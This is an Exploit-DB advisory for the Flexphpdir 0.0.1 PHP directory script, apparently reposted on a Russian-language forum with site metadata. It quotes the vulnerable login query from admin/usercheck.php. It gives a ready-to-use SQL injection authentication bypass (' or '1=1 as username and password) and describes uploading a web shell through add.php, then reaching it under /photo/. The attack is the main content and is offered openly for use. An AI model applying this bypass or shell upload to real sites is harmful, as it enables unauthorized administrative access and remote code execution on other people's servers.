- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7614
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6750 cve-2008-6749
- Дата публикации
- 2008-12-29
Код:
#############################################
Autore: x0r
Email: [email protected]
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphpdiren
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpdir/
##############################################
Bug In \admin\usercheck.php 'n' \add.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
Shell Upload:
Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^
Greetz: I Miss You...
# milw0rm.com [2008-12-29]- Источник
- www.exploit-db.com
